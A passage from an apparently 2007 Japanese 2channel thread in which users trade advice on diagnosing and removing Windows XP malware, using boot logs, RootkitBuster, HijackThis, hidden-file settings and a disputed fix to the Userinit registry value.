残念ながらここまでのようですね…
345 :名無しさん@お腹いっぱい。:2007/01/20(土) 01:35:54
vaioでリカバリユーティリティ入ってたなら同時にリカバリディスク作成機能もついてるはずなんだけどな
いまさらだけど説明書にもリカバリディスクの作成は推奨事項で載ってるし
いまさらだけど説明書にもリカバリディスクの作成は推奨事項で載ってるし
346 : ◆N9P3SuvBPo :2007/01/20(土) 01:52:42
さすがに日中バイト、夜は遅くまでここでサポートは
正直言って辛いな…明日、明後日休みだからいいけど
正直言って辛いな…明日、明後日休みだからいいけど
347 :名無しさん@お腹いっぱい。:2007/01/20(土) 01:55:52
348 : ◆N9P3SuvBPo :2007/01/20(土) 01:57:39
>347
こういう経験も勉強にひとつとなるし
万が一に備えて保険は絶対必要ってことですね。
こういう経験も勉強にひとつとなるし
万が一に備えて保険は絶対必要ってことですね。
349 : ◆N9P3SuvBPo :2007/01/20(土) 02:36:49
ちょっと待て…
リカバリ領域がやられたら、リカバリが出来なくなるんじゃないの?
あの質問者はちゃんとリカバリしたと書いてあるから、
リカバリ領域が破壊されたというのは、考えられないんじゃない?
でも、どの道修理orリカバリCD取り寄せは確定ですな。
もう寝よう…
リカバリ領域がやられたら、リカバリが出来なくなるんじゃないの?
あの質問者はちゃんとリカバリしたと書いてあるから、
リカバリ領域が破壊されたというのは、考えられないんじゃない?
でも、どの道修理orリカバリCD取り寄せは確定ですな。
もう寝よう…
350 :名無しさん@お腹いっぱい。:2007/01/20(土) 02:54:45
351 :名無しさん@お腹いっぱい。:2007/01/20(土) 03:33:39
vaioだったら5000円くらいでリカバリディスク買うことができるからまずはそれやってみてからだよね
352 :名無しさん@お腹いっぱい。:2007/01/20(土) 06:57:44
前にvaioのプロセス見たけど
なんか独特なのがウジャウジャ動いてたな
なんか独特なのがウジャウジャ動いてたな
353 :名無しさん@お腹いっぱい。:2007/01/20(土) 10:46:21
最近、2ちゃん専ブラJaneやSleipnir2を使ってると、当該ソフト(ひどい時にはウィルスバスターを始めクリックするソフト全て)が
CPUの使用率を100パーセント使ってしまい再起動を余儀なくされます。
この様な挙動を示す物って何があるのでしょうか?またどのように対策すれば良いのでしょうか。アドバイスをお願いします。
CPUの使用率を100パーセント使ってしまい再起動を余儀なくされます。
この様な挙動を示す物って何があるのでしょうか?またどのように対策すれば良いのでしょうか。アドバイスをお願いします。
354 :名無しさん@お腹いっぱい。:2007/01/20(土) 12:25:14
>>353
リカバリ
リカバリ
355 :名無しさん@お腹いっぱい。:2007/01/20(土) 16:49:07
質問させていただきます。
【使用OS】 WindowsXP Pro SP2
【MicrosoftUpdate】 最新です。
【使用セキュリティソフト】 Symantec Antivirus Ver10.0
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です。
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 検出されない。
【どんな症状が出るか】 一定時間ごとにIEが起動して中国のサイトが勝手に開く。
接続されているすべてのドライブにアクセスするとクイックランチャーに化け文字したlinkファイル、
ディスクトップにIEのショートカット、プログラムにIEのショートカット、スタートアップに
IEのショートカットが作成される。それらは全て同じ中国のサイトにつながる。
【症状が出る前に何をやったか】 アップローダーから落とした動画を右クリックでスキャンしようと
して誤ってプレイヤーで実行してしまった、その時承認がどうのこうのというアラートが出て
やめたが、それが一番くさい。
【症状を解決しようとどのような処置を取ったか】 SpybotやAD-AWARE、オンラインスキャンもいくつか
試したが、Cookieが検出され削除を行ってくれるが解決されず。
【その他の質問】 しかたがないので、別のHDDに新しくOSをインストールしたが、接続していた他の
ドライブ(USBやATA接続の)にアクセスすると「pagefile.exeが見つかりません」というアラートが
出てクイックランチャーに化け文字したlinkファイル、ディスクトップにIEのショートカット、プログラムに
IEのショートカット、スタートアップにIEのショートカットが作成される。
これでは他のドライブのデータが使えないし、移そうにも何を省けばいいかが分かりません。
解決策ご存じの方がいらっしゃればご指導お願いいたします。
【使用OS】 WindowsXP Pro SP2
【MicrosoftUpdate】 最新です。
【使用セキュリティソフト】 Symantec Antivirus Ver10.0
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です。
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 検出されない。
【どんな症状が出るか】 一定時間ごとにIEが起動して中国のサイトが勝手に開く。
接続されているすべてのドライブにアクセスするとクイックランチャーに化け文字したlinkファイル、
ディスクトップにIEのショートカット、プログラムにIEのショートカット、スタートアップに
IEのショートカットが作成される。それらは全て同じ中国のサイトにつながる。
【症状が出る前に何をやったか】 アップローダーから落とした動画を右クリックでスキャンしようと
して誤ってプレイヤーで実行してしまった、その時承認がどうのこうのというアラートが出て
やめたが、それが一番くさい。
【症状を解決しようとどのような処置を取ったか】 SpybotやAD-AWARE、オンラインスキャンもいくつか
試したが、Cookieが検出され削除を行ってくれるが解決されず。
【その他の質問】 しかたがないので、別のHDDに新しくOSをインストールしたが、接続していた他の
ドライブ(USBやATA接続の)にアクセスすると「pagefile.exeが見つかりません」というアラートが
出てクイックランチャーに化け文字したlinkファイル、ディスクトップにIEのショートカット、プログラムに
IEのショートカット、スタートアップにIEのショートカットが作成される。
これでは他のドライブのデータが使えないし、移そうにも何を省けばいいかが分かりません。
解決策ご存じの方がいらっしゃればご指導お願いいたします。
356 :名無しさん@お腹いっぱい。:2007/01/20(土) 17:42:03
>>355
シマンテック・セキュリティチェック (*無償オンライン ウィルススキャンサービス)
http://www.symantec.com/region/jp/securitycheck/index.html
シマンテック・セキュリティチェック (*無償オンライン ウィルススキャンサービス)
http://www.symantec.com/region/jp/securitycheck/index.html
357 : ◆N9P3SuvBPo :2007/01/20(土) 19:10:23
さっき繋がらなかったから閉鎖された?って思ったけど
今ようやく繋がるようになってきたっすね。
>355
ちょっと試してみたいことあるんだけど、協力していただけますか。
内容は「ntbtlog.txt」の貼り付けです。
PCを起動してF8キーを連打します
↓
Windows拡張オプションで[ブートのログ作成を有効にする]を選択し、
Windowsを通常モードで起動します
↓
CドライブのWindowsフォルダ内に[ntbtlog.txt]という名前の
テキストファイルが作成されますので、
これをアップローダー掲示板にupしてもらえますか。
今ようやく繋がるようになってきたっすね。
>355
ちょっと試してみたいことあるんだけど、協力していただけますか。
内容は「ntbtlog.txt」の貼り付けです。
PCを起動してF8キーを連打します
↓
Windows拡張オプションで[ブートのログ作成を有効にする]を選択し、
Windowsを通常モードで起動します
↓
CドライブのWindowsフォルダ内に[ntbtlog.txt]という名前の
テキストファイルが作成されますので、
これをアップローダー掲示板にupしてもらえますか。
358 :名無しさん@お腹いっぱい。:2007/01/20(土) 19:22:35
中華製のトロイ?
これからはこういうのが増えるのかな
これからはこういうのが増えるのかな
359 : ◆N9P3SuvBPo :2007/01/20(土) 19:35:37
>358
しかもこいつな、マイクロソフトの名前を騙ったフォルダを作成する厄介ものなんでね。
しかもこいつな、マイクロソフトの名前を騙ったフォルダを作成する厄介ものなんでね。
360 :名無しさん@お腹いっぱい。:2007/01/20(土) 20:16:20
>355です。
>356
>357
レスありがとうございます。
>356
自分がノートンを使っているので、シマンテックのオンラインスキャンはしていませんでした。
試してみます。
>357
分かりました。アップローダーはどこでもいいんですか?このスレッドの決まりのロダとか
あるんでしょうか?
>356
>357
レスありがとうございます。
>356
自分がノートンを使っているので、シマンテックのオンラインスキャンはしていませんでした。
試してみます。
>357
分かりました。アップローダーはどこでもいいんですか?このスレッドの決まりのロダとか
あるんでしょうか?
361 : ◆N9P3SuvBPo :2007/01/20(土) 20:20:00
>360
どこでもいいよ。
どこでもいいよ。
362 :名無しさん@お腹いっぱい。:2007/01/20(土) 20:44:59
363 : ◆N9P3SuvBPo :2007/01/20(土) 21:34:29
>362
見た限りでは、怪しげなルートキットは無いようですね。
DaemonToolsが作成するルートキットはありますが、こちらは問題ありません。
見逃しがあるかも知れないので、RootkitBusterでスキャンしてください。
見た限りでは、怪しげなルートキットは無いようですね。
DaemonToolsが作成するルートキットはありますが、こちらは問題ありません。
見逃しがあるかも知れないので、RootkitBusterでスキャンしてください。
364 :名無しさん@お腹いっぱい。:2007/01/20(土) 21:38:00
> DaemonToolsが作成するルートキットはありますが
まじっすか
まじっすか
365 : ◆N9P3SuvBPo :2007/01/20(土) 21:44:21
>364
これですよ
>d347bus.sys
何故かRootkitBusterで検出対象になってるんですね。
これですよ
>d347bus.sys
何故かRootkitBusterで検出対象になってるんですね。
366 :名無しさん@お腹いっぱい。:2007/01/20(土) 21:48:11
PC初心者板でもDaemonToolsは何故か良くないものとしての反応見かけたことある
仮想ドライブくらいBHAでもあるのになんでだろうな
仮想ドライブくらいBHAでもあるのになんでだろうな
367 :名無しさん@お腹いっぱい。:2007/01/20(土) 21:55:56
トロイの木馬名 New malware.i
<アプリケーションによる 〜 アクセス要求>
プロクラム protector.exe がアクセスを要求しています、と何度も出てきて困っています・・・
重要なファイルにも感染したらしく、削除以外に何かいい方法はないでしょうか?
・・・てか、かなり重要なファイルなのか、ファイルがプロテクトされていて削除もできないと出てきます・・・
<アプリケーションによる 〜 アクセス要求>
プロクラム protector.exe がアクセスを要求しています、と何度も出てきて困っています・・・
重要なファイルにも感染したらしく、削除以外に何かいい方法はないでしょうか?
・・・てか、かなり重要なファイルなのか、ファイルがプロテクトされていて削除もできないと出てきます・・・
368 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:15:26
369 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:16:51
>362です。
>362
そうですか、ありがとうございました。
駆除できなかった場合、システムはあきらめて再インストールしてもよいのですが
問題は接続されていた他のドライブなんですよ。
前にも書きましたが、新しく別のHDDにインストールしたOSで立ち上げて前から接続していた
USBのHDDを繋げてアクセスしたらディスクトップやスタートアップやらにショートカットが作成
されましたから。
一応調べてたら、こういう類はドライブのルートにautorun.infやautorun.exeを作成するとあったので
検索して削除しましたがだめでした。
「不可視ファイルを表示する」にしていても見えないようになっているんですかね?
触れないのであればドライブ内のデータだけコピーツールで他所に移動してしまうだけなんですが。
直接クリックしない限りは発動しなかったので。
長々と質問ばかりですみません。
>362
そうですか、ありがとうございました。
駆除できなかった場合、システムはあきらめて再インストールしてもよいのですが
問題は接続されていた他のドライブなんですよ。
前にも書きましたが、新しく別のHDDにインストールしたOSで立ち上げて前から接続していた
USBのHDDを繋げてアクセスしたらディスクトップやスタートアップやらにショートカットが作成
されましたから。
一応調べてたら、こういう類はドライブのルートにautorun.infやautorun.exeを作成するとあったので
検索して削除しましたがだめでした。
「不可視ファイルを表示する」にしていても見えないようになっているんですかね?
触れないのであればドライブ内のデータだけコピーツールで他所に移動してしまうだけなんですが。
直接クリックしない限りは発動しなかったので。
長々と質問ばかりですみません。
訂正
×を作成が
○が作成
×を作成が
○が作成
371 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:19:48
>362
そうですか、ありがとうございました。
間違いました。
>363
そうですか、ありがとうございました。
でした。
そうですか、ありがとうございました。
間違いました。
>363
そうですか、ありがとうございました。
でした。
372 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:23:45
373 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:26:57
>>369
マイコンピュータ→コントロールパネル→フォルダオプション→表示タブをクリック
1.「すべてのファイルとフォルダを表示する」にチェック
2.「登録されているファイルの拡張子は表示しない」のチェックを外す
3.「保護されたオペーレーションシステムファイルは表示しない」のチェックを外す
3をやったのかな?
マイコンピュータ→コントロールパネル→フォルダオプション→表示タブをクリック
1.「すべてのファイルとフォルダを表示する」にチェック
2.「登録されているファイルの拡張子は表示しない」のチェックを外す
3.「保護されたオペーレーションシステムファイルは表示しない」のチェックを外す
3をやったのかな?
>369
>直接クリックしない限りは発動しなかったので。
ドライブをダブルクリックという意味です、エクスプローラーでは発動しなかったので。
>直接クリックしない限りは発動しなかったので。
ドライブをダブルクリックという意味です、エクスプローラーでは発動しなかったので。
375 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:28:28
376 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:30:12
>373
あ、3はやってませんでした。
やってみます。
あ、3はやってませんでした。
やってみます。
377 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:39:59
>>375
スタート→マイコンピューター→CドライブをクリックWindowsシステムフォルダをクリック
スタート→マイコンピューター→CドライブをクリックWindowsシステムフォルダをクリック
378 : ◆N9P3SuvBPo :2007/01/20(土) 22:47:58
なんかRootkitによって隠されたファイルって
>373しても見えなくなっているんじゃない。
だから該当するサービスを無効にすればいいわけだが、
当然system権限によって実行されているわけなので、
一筋縄ではいかないという。
>373しても見えなくなっているんじゃない。
だから該当するサービスを無効にすればいいわけだが、
当然system権限によって実行されているわけなので、
一筋縄ではいかないという。
379 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:53:51
Rootkitのファイルは
373をしても見れない不可視ファイルを見る方法が有るらしいが・・・
俺は知らん
まぁ一応すべてをやるだけはやってみてもよかろう
373をしても見れない不可視ファイルを見る方法が有るらしいが・・・
俺は知らん
まぁ一応すべてをやるだけはやってみてもよかろう
380 : ◆N9P3SuvBPo :2007/01/20(土) 22:57:23
一度ルートキットバスターのログ貼りして、それでルートキットが
見付かれば対処して行く形になるんだけど
見付かれば対処して行く形になるんだけど
381 :名無しさん@お腹いっぱい。:2007/01/20(土) 22:58:05
ちょっとすれ違いかもですが質問です。
電話が盗聴されるように、パソコン画面も盗聴(?)されたりするんでしょうか?
(ハッキングっていうのかな?)
当方、以前なぜか判らないのですが、興信所から身辺調査をされてました。
その時のことなんですが、パソコンを使っているとADSLなのに通信速度が極端に落ちて
いたのです。もうISDNくらいの速度まで落ちてました。
んで、それ関連のスレッドに質問したところ「回線にノイズが入ってるんじゃね?」と
いわれあまり気にかけてなかったのです・・・。
今思えば、これって興信所がパソコンに入ってきて自分の個人情報を閲覧してたって
ことも考えられますよね?実際問題技術的にどうなんでしょうか?可能なのでしょうか?
電話が盗聴されるように、パソコン画面も盗聴(?)されたりするんでしょうか?
(ハッキングっていうのかな?)
当方、以前なぜか判らないのですが、興信所から身辺調査をされてました。
その時のことなんですが、パソコンを使っているとADSLなのに通信速度が極端に落ちて
いたのです。もうISDNくらいの速度まで落ちてました。
んで、それ関連のスレッドに質問したところ「回線にノイズが入ってるんじゃね?」と
いわれあまり気にかけてなかったのです・・・。
今思えば、これって興信所がパソコンに入ってきて自分の個人情報を閲覧してたって
ことも考えられますよね?実際問題技術的にどうなんでしょうか?可能なのでしょうか?
>380
RootkitBusterでのログです。
もしよろしければ、調べてみて頂けないでしょうか。
ttp://www-2ch.net:8080/up/download/1169302420410051.cC9ZmZ
pass:122333
RootkitBusterでのログです。
もしよろしければ、調べてみて頂けないでしょうか。
ttp://www-2ch.net:8080/up/download/1169302420410051.cC9ZmZ
pass:122333
383 : ◆N9P3SuvBPo :2007/01/20(土) 23:36:29
>382
RootkitBusterのログには問題ありません
しかし、何故[d347bus.sys](DaemonTools)が検出されるのかわからん…
RootkitBusterのログには問題ありません
しかし、何故[d347bus.sys](DaemonTools)が検出されるのかわからん…
384 : ◆N9P3SuvBPo :2007/01/21(日) 00:36:36
…と、すると、あとはHijackThisの処理で何とかなりそうな気がしますね。
385 :名無しさん@お腹いっぱい。:2007/01/21(日) 00:42:22
>>377
その名前のフォルダはなかったのでたぶんWindowsというフォルダの事を言ってるのだと思いますが、その中には、そのファイルはありませんでしたよ
その名前のフォルダはなかったのでたぶんWindowsというフォルダの事を言ってるのだと思いますが、その中には、そのファイルはありませんでしたよ
>383
ありがとうございました。
>373さんにご指摘いただいたように、私の初歩的なミスだったので隠しファイルは見ることが
出来るようになったのでautorun.infとpagefile.exeを消すことによってショートカットやリンクが
勝手に作成されることはなくなりました。また再起動しても各ドライブにautorun.infとpagefile.exeが
作成される事はありませんでした。
ただ、一定時間ごとにIEが勝手に起動して中国のサイトを開くのはそのままです。
これは、ノートンやSpybot・AD-AWAREその他のオンラインスキャンでも駆除出来ません。
ありがとうございました。
>373さんにご指摘いただいたように、私の初歩的なミスだったので隠しファイルは見ることが
出来るようになったのでautorun.infとpagefile.exeを消すことによってショートカットやリンクが
勝手に作成されることはなくなりました。また再起動しても各ドライブにautorun.infとpagefile.exeが
作成される事はありませんでした。
ただ、一定時間ごとにIEが勝手に起動して中国のサイトを開くのはそのままです。
これは、ノートンやSpybot・AD-AWAREその他のオンラインスキャンでも駆除出来ません。
>384
HijackThisですか。
試してみます。
HijackThisですか。
試してみます。
388 : ◆N9P3SuvBPo :2007/01/21(日) 00:53:26
おっとっと、HijackThisのログはここに貼り付けてもらっても構いませんよ。
サイズは数KBくらいですので
サイズは数KBくらいですので
>388
ありがとうございます。
説明を読んでみましたが、私では判断しかねるようなのでお願いいたします。
また、直貼りするには文が長すぎるのでうpしました。
ご面倒とは思いますがよろしくお願いします。
hijackthis log
ttp://www-2ch.net:8080/up/download/1169309387449250.UN2pCJ
pass:122333
ありがとうございます。
説明を読んでみましたが、私では判断しかねるようなのでお願いいたします。
また、直貼りするには文が長すぎるのでうpしました。
ご面倒とは思いますがよろしくお願いします。
hijackthis log
ttp://www-2ch.net:8080/up/download/1169309387449250.UN2pCJ
pass:122333
390 :名無しさん@お腹いっぱい。:2007/01/21(日) 01:53:06
>>381
パソコン画面の盗聴は可能らしい。CRTからの漏れ電磁波を拾うとか。
でも興信所ならパソコン画面関連より電話盗聴の可能性が高いと思う。
建物のすぐ外の電話回線の設備に盗聴器が仕掛けられていたら通信速度が下がってもおかしくない。
パソコン画面の盗聴は可能らしい。CRTからの漏れ電磁波を拾うとか。
でも興信所ならパソコン画面関連より電話盗聴の可能性が高いと思う。
建物のすぐ外の電話回線の設備に盗聴器が仕掛けられていたら通信速度が下がってもおかしくない。
391 : ◆N9P3SuvBPo :2007/01/21(日) 02:13:26
なんかshareEDGEではPCANotify.dllをトロイと言ってるがどうなんだろう。
(higaitaisaku.comではこのエントリーFIX対象から外されてるし)
>389
P2Pソフトの残骸が残ってますぜw
今はこれだけFIXしてください。
O1 - Hosts: 80.175.31.63 www.winmx.com
こちらの3つのファイルなんですが、
C:\Program Files\real\atloader.dll
C:\Program Files\real\adx.exe
C:\WINDOWS\SYSTEM32\PCANotify.dll
ファイルのプロパティを表示して、
・作成日
・著作権
・会社名
を教えてもらえますか?
(higaitaisaku.comではこのエントリーFIX対象から外されてるし)
>389
P2Pソフトの残骸が残ってますぜw
今はこれだけFIXしてください。
O1 - Hosts: 80.175.31.63 www.winmx.com
こちらの3つのファイルなんですが、
C:\Program Files\real\atloader.dll
C:\Program Files\real\adx.exe
C:\WINDOWS\SYSTEM32\PCANotify.dll
ファイルのプロパティを表示して、
・作成日
・著作権
・会社名
を教えてもらえますか?
392 :名無しさん@お腹いっぱい。:2007/01/21(日) 02:19:00
>>385
Windows 95/98/Me の場合
<Windowsシステムフォルダ> = C:\Windows\System
Windows NT/2000 の場合
<Windowsシステムフォルダ> = C:\WinNT\System32
Windows XP の場合
<Windowsシステムフォルダ> = C:\Windows\System32
これだろ。
初心者スレ行ったほうがいいよ
Windows 95/98/Me の場合
<Windowsシステムフォルダ> = C:\Windows\System
Windows NT/2000 の場合
<Windowsシステムフォルダ> = C:\WinNT\System32
Windows XP の場合
<Windowsシステムフォルダ> = C:\Windows\System32
これだろ。
初心者スレ行ったほうがいいよ
>391
こんな遅い時間にありがとうございます。
3つのファイルに関しては以下の通りでした。
atloader.dll
作成日:2006年12月31日、16:26:22
著作権:
会社名:Microsoft Corporation
adx.exe
作成日:2006年12月30日、16:20:56
著作権:
会社名:Microsoft Corporation
PCANotify.dll
作成日:2006年3月8日、12:00:00
著作権:Copyright 2006 Symantec Corporation
会社名:Symantec Corporation
こんな遅い時間にありがとうございます。
3つのファイルに関しては以下の通りでした。
atloader.dll
作成日:2006年12月31日、16:26:22
著作権:
会社名:Microsoft Corporation
adx.exe
作成日:2006年12月30日、16:20:56
著作権:
会社名:Microsoft Corporation
PCANotify.dll
作成日:2006年3月8日、12:00:00
著作権:Copyright 2006 Symantec Corporation
会社名:Symantec Corporation
394 : ◆N9P3SuvBPo :2007/01/21(日) 03:27:03
>393
ふむ、確かにログに目立った問題はありませんが、
何故中華系のサイトが開くんだろうね。
いちおう、ごみ掃除でもしとかないか。
インターネットオプション→ファイルの削除(全てのオフラインにチェックを付ける)
スタート→ファイル名を指定して実行→%temp% と入力してOK
Ctrl+Aで全て反転させて、中にある物を削除
ふむ、確かにログに目立った問題はありませんが、
何故中華系のサイトが開くんだろうね。
いちおう、ごみ掃除でもしとかないか。
インターネットオプション→ファイルの削除(全てのオフラインにチェックを付ける)
スタート→ファイル名を指定して実行→%temp% と入力してOK
Ctrl+Aで全て反転させて、中にある物を削除
395 :名無しさん@お腹いっぱい。:2007/01/21(日) 06:32:27
【使用OS】 「windows XP」
【Windows Updateの状態】 「昨日更新した」
【使用セキュリティソフトとバージョン】 「Norton SystemWorks 2005」
【セキュリティソフトの定義ファイルは最新の状態であるか】 「最新」
【スパイウェア対策ソフト】 「Spybot - Search & Destroy」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 「忘れた、検出さ
れたのは削除済み」
【どんな症状が出るか】 「メールが勝手に送信される(メッセージスキャンで送信されず)
後、C:に.nlsファイルが作成される、1000〜2999で(cp1000,nlsって感じで)」
【症状が出る前に何をやったか】 「ttp://www.emuasylum.com/index.php サイトの
R@Mの機種ページを開いた・・・・・」
【症状を解決しようとどのような処置を取ったか】 「ノートンやら無料スキャンやウェブ
上スキャンを試した、検出されたのは一通り削除済み多分・・・・でも治らないorz」
【その他の質問】 「一昨日からこの状態・・・・リカバリしようにもディスクが行方不明・・・」
【Windows Updateの状態】 「昨日更新した」
【使用セキュリティソフトとバージョン】 「Norton SystemWorks 2005」
【セキュリティソフトの定義ファイルは最新の状態であるか】 「最新」
【スパイウェア対策ソフト】 「Spybot - Search & Destroy」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 「忘れた、検出さ
れたのは削除済み」
【どんな症状が出るか】 「メールが勝手に送信される(メッセージスキャンで送信されず)
後、C:に.nlsファイルが作成される、1000〜2999で(cp1000,nlsって感じで)」
【症状が出る前に何をやったか】 「ttp://www.emuasylum.com/index.php サイトの
R@Mの機種ページを開いた・・・・・」
【症状を解決しようとどのような処置を取ったか】 「ノートンやら無料スキャンやウェブ
上スキャンを試した、検出されたのは一通り削除済み多分・・・・でも治らないorz」
【その他の質問】 「一昨日からこの状態・・・・リカバリしようにもディスクが行方不明・・・」
396 :名無しさん@お腹いっぱい。:2007/01/21(日) 09:41:50
397 :名無しさん@お腹いっぱい。:2007/01/21(日) 09:52:19
>>392
ありがとうございます!フォルダを見つけられました。
>>377氏に教えてもらったファイルは見つかりませんでした。スキャンの時の情報からここに問題があるんだと思いますが・・・
次になにか不明な事があったら初心者スレに行ってみます
ありがとうございます!フォルダを見つけられました。
>>377氏に教えてもらったファイルは見つかりませんでした。スキャンの時の情報からここに問題があるんだと思いますが・・・
次になにか不明な事があったら初心者スレに行ってみます
>>396
なかったよ・・・
それより大変なというより、アホなことをしてまった・・
ノートンのHPで、症状が似てるウイルス情報が有ったので
>>ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-backdoor.amitis.c.html
にしたがって、レジストを弄ってたら
ログオン出来なくなった・・・・・
正確には、ログオン>情報読み込み>ログオフ>情報保存の無限ループに
多分、関係ない?Loadを削除てたせいかも・・・
レジスト保存してても、ログオン出来ないから修正も出来ない
助けて・・・・(´Д⊂
なかったよ・・・
それより大変なというより、アホなことをしてまった・・
ノートンのHPで、症状が似てるウイルス情報が有ったので
>>ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-backdoor.amitis.c.html
にしたがって、レジストを弄ってたら
ログオン出来なくなった・・・・・
正確には、ログオン>情報読み込み>ログオフ>情報保存の無限ループに
多分、関係ない?Loadを削除てたせいかも・・・
レジスト保存してても、ログオン出来ないから修正も出来ない
助けて・・・・(´Д⊂
399 :名無しさん@お腹いっぱい。:2007/01/21(日) 12:22:53
400 :名無しさん@お腹いっぱい。:2007/01/21(日) 14:43:14
401 :名無しさん@お腹いっぱい。:2007/01/21(日) 15:41:52
Win32:Vibpack [Wrm]
これってウィルスですか?
どんなウィルスか教えてください
これってウィルスですか?
どんなウィルスか教えてください
402 : ◆N9P3SuvBPo :2007/01/21(日) 16:53:52
>398
居る?
これは間違い無くシマンテックが悪いですね。
居る?
これは間違い無くシマンテックが悪いですね。
>>399
へぼPCだから、OS再インストールはムリポ、買ってきたらできるけど
・・・・・落とすか・・・・
でもリカバリディスク見つかったから、もうそれしかないかも・・・・
>>400
今沖田・・・・
いや、自分が悪いよ・・・不精してフルスキャンしなかったからね
でも、今まで色々な物でスキャンしてたんで
またスキャンすんのかよ、感じだったんだよ・・・
やはりログオンをスルーする方法なんて無いか・・・
リカバリはしたくないんだよ、パスとかC:に保存してしまってるから
ってPCが、使え無いんじゃそれ以前だけどね・・・
へぼPCだから、OS再インストールはムリポ、買ってきたらできるけど
・・・・・落とすか・・・・
でもリカバリディスク見つかったから、もうそれしかないかも・・・・
>>400
今沖田・・・・
いや、自分が悪いよ・・・不精してフルスキャンしなかったからね
でも、今まで色々な物でスキャンしてたんで
またスキャンすんのかよ、感じだったんだよ・・・
やはりログオンをスルーする方法なんて無いか・・・
リカバリはしたくないんだよ、パスとかC:に保存してしまってるから
ってPCが、使え無いんじゃそれ以前だけどね・・・
404 : ◆N9P3SuvBPo :2007/01/21(日) 17:48:06
なんとかしてでもデスクトップにたどり着くことできないものかな
ようこそ画面のところで[Ctrl+Alt+Delite]でタスクマネージャ出せたら
[タスクの実行」から[c:\windows\explorer.exe]を実行ってなかんじで
ようこそ画面のところで[Ctrl+Alt+Delite]でタスクマネージャ出せたら
[タスクの実行」から[c:\windows\explorer.exe]を実行ってなかんじで
406 :名無しさん@お腹いっぱい。:2007/01/21(日) 18:02:56
explorer.exe以下の %Windir%\MVH.exe"だけを削除すればよかったのか
この書き方だと確かに間違えるかもな
407 :名無しさん@お腹いっぱい。:2007/01/21(日) 18:05:55
救出用にknoppix(CDから起動するlinux)を使えばファイルを待避させたり書き換えたり出来るよ。
409 :名無しさん@お腹いっぱい。:2007/01/21(日) 18:07:54
410 : ◆N9P3SuvBPo :2007/01/21(日) 18:14:56
ようこそ画面のループは
例えセーフモードだろうが、全快正常起動時の構成だろうが無意味だろうね。
>406
あと、正しくは
修正前="Userinit" = "userinit.exe %Windir%\MVH.exe"
修正後="Userinit" = "userinit.exe, "
例えセーフモードだろうが、全快正常起動時の構成だろうが無意味だろうね。
>406
あと、正しくは
修正前="Userinit" = "userinit.exe %Windir%\MVH.exe"
修正後="Userinit" = "userinit.exe, "
411 :名無しさん@お腹いっぱい。:2007/01/21(日) 18:21:03
>>405
まったくもってそのとおりです、返す言葉もない
まあ、大事なものっていったら、パスぐらいだけどね
ゲーム(エロゲとエミュ)とか有るけど、それはどうにでもなる
セーブデーターは勿体無いけど・・・・
>>406
何か足りないなと思いながらも消した自分のボンミスです・・・・
>>407
なんと、そんな物が有るとは
試してみます
皆さんこんな奴の為に色々ありがとう( ´Д⊂ヽ
まったくもってそのとおりです、返す言葉もない
まあ、大事なものっていったら、パスぐらいだけどね
ゲーム(エロゲとエミュ)とか有るけど、それはどうにでもなる
セーブデーターは勿体無いけど・・・・
>>406
何か足りないなと思いながらも消した自分のボンミスです・・・・
>>407
なんと、そんな物が有るとは
試してみます
皆さんこんな奴の為に色々ありがとう( ´Д⊂ヽ
414 : ◆N9P3SuvBPo :2007/01/21(日) 18:30:45
>409
とりあえず検索してみて、ウイルスなら自力で解決を図ってみるか、
無理なら大事なデータをバックアップ取ってリカバリーですな。
>411
Winlogonってキーはようこそ画面のところで読みこまれますからね。
当然セーフモードでも読みこまれるため、このレジストリ領域が
やられてしまうと復旧は困難になる。
とりあえず検索してみて、ウイルスなら自力で解決を図ってみるか、
無理なら大事なデータをバックアップ取ってリカバリーですな。
>411
Winlogonってキーはようこそ画面のところで読みこまれますからね。
当然セーフモードでも読みこまれるため、このレジストリ領域が
やられてしまうと復旧は困難になる。
415 : ◆N9P3SuvBPo :2007/01/21(日) 18:33:27
>413
え、本当に正確なのはこうじゃないの?
"Userinit" =c:\windows\system32\userinit.exe,
自分のXPはこうなってた。
環境によって違うかもしれませんね。
え、本当に正確なのはこうじゃないの?
"Userinit" =c:\windows\system32\userinit.exe,
自分のXPはこうなってた。
環境によって違うかもしれませんね。
417 :名無しさん@お腹いっぱい。:2007/01/21(日) 19:46:13
。oO
(゚д゚)―┛(スパーッ)
。oO
つポイッミ―┛
。oO
―┛
(゚д゚)<質問すっぞ
【使用OS】 XPだ
【MicrosoftUpdate】 日本語で書け
【使用セキュリティソフト】 なんだ?それ
【セキュリティソフトの定義ファイルは最新の状態であるか】 (。д゚)はぁ?
【ルータの有無】 無線だ
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 HDDに負担がかかることなんてやるわけねーだろが
【どんな症状が出るか】 とにかく重たいんだよ
【症状が出る前に何をやったか】 はぁ?(゜д゜)誰に向かって口聞いてんだ
【症状を解決しようとどのような処置を取ったか】 何もわからねーのにどうすることもできねーだろが
【その他の質問】 なんで重くなったのか知らないのか?(゚д゚)あ?
(゚д゚)―┛(スパーッ)
。oO
つポイッミ―┛
。oO
―┛
(゚д゚)<質問すっぞ
【使用OS】 XPだ
【MicrosoftUpdate】 日本語で書け
【使用セキュリティソフト】 なんだ?それ
【セキュリティソフトの定義ファイルは最新の状態であるか】 (。д゚)はぁ?
【ルータの有無】 無線だ
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 HDDに負担がかかることなんてやるわけねーだろが
【どんな症状が出るか】 とにかく重たいんだよ
【症状が出る前に何をやったか】 はぁ?(゜д゜)誰に向かって口聞いてんだ
